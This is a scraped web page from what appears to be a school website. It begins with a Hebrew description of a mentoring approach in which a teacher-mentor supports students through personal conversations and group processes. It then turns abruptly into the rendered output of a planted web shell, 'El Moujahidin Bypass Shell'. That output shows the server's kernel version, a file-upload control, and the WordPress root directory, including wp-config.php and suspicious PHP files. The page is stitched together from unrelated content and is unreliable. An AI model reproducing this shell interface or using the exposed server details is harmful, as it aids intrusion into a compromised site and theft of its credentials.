חניכה ריאלית

החניכה הריאלית היא נקודת החיבור בין עולמו הרגשי של התלמיד, הסביבה החברתית והמעשה הלימודי. הפרט – התלמיד – במוקד תהליך החניכה, אולם לרשת החברתית שבה הוא מצוי, יש משמעות מכרעת.

חניכה ריאלית במסגרת מארג בריאליהמורה-החונך תומך ומאפשר את תהליכי ההתפתחות של התלמידים כיחידים וכקבוצה מתוך עמדה של אכפתיות, הקשבה ופתיחות. הוא מזמן תהליך דיאלוגי שבו שותפים התלמיד והחונך. יחד הם לומדים להפיק משמעות מסיפורי החיים שמביא התלמיד, במסגרת שיחות אישיות פתוחות. מוקד השיחות הוא צורכי החניך, התלבטויותיו, תחומי העניין שלו וכל מה שהוא בוחר לשתף בו.
בתהליך הקבוצתי התכנים עולים מתוך ההתרחשות ומתמקדים בתלמידים ובעולמם. התהליך הקבוצתי מזמן למידה וביטוי עצמי, רכישה של כישורי חיים ושיפור של יכולות למידה. החונך עובר ממעמד של מיישם הפעלות חיצוניות ונתונות מראש לשעות מחנך, למבוגר משמעותי הממוקד בעולמם של התלמידים כפרטים וכקבוצה ומזמן להם מרחב לצמיחה, להתפתחות ולבירור שאלות של זהות באמצעות קבוצת השווים.
החניכה מעצבת מסגרת שבה יש מקום לכולם, שבה רואים את כולם, לא רק את ה"קצוות". היא מקנה כלים ומעודדת לעצמאות וללקיחת אחריות.

El Moujahidin Bypass Shell

Current Path : /home/reali/public_html/

Linux danreali 3.13.0-68-generic #111-Ubuntu SMP Fri Nov 6 18:17:06 UTC 2015 x86_64
Upload File :

Name
Size
Permissions
Options
.usermin
--
drwx------
biram-courses-2017
--
drwxr-xr-x
booklet
--
drwxr-xr-x
invention
--
drwxr-xr-x
maps
--
drwxr-xr-x
meydaon-biram
--
drwxr-xr-x
org
--
drwxr-xr-x
phpmyadmin
--
drwxr-xr-x
reali-100
--
drwxr-xr-x
reg
--
drwxr-xr-x
shapira
--
drwxr-xr-x
shapira-2014
--
drwxr-xr-x
truma
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.678 KB
-rw-r--r--
google3b31a5353cb3d20d.html
0.052 KB
-rw-r--r--
index.php
0.408 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
readme.html
7.259 KB
-rw-r--r--
ttt.php
0.067 KB
-rw-r--r--
wp-activate.php
5.319 KB
-rw-r--r--
wp-blog-header.php
0.355 KB
-rw-r--r--
wp-class.php
25.106 KB
-rw-r--r--
wp-comments-post.php
1.589 KB
-rw-r--r--
wp-config-sample.php
2.786 KB
-rw-r--r--
wp-config.php
3.874 KB
-rw-r--r--
wp-cron.php
3.209 KB
-rw-r--r--
wp-links-opml.php
2.365 KB
-rw-r--r--
wp-load.php
3.224 KB
-rw-r--r--
wp-login.php
33.144 KB
-rw-r--r--
wp-mail.php
7.859 KB
-rw-r--r--
wp-settings.php
15.874 KB
-rw-r--r--
wp-signup.php
29.195 KB
-rw-r--r--
wp-trackback.php
4.407 KB
-rw-r--r--
xmlrpc.php
2.993 KB
-rw-r--r--

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: [email protected]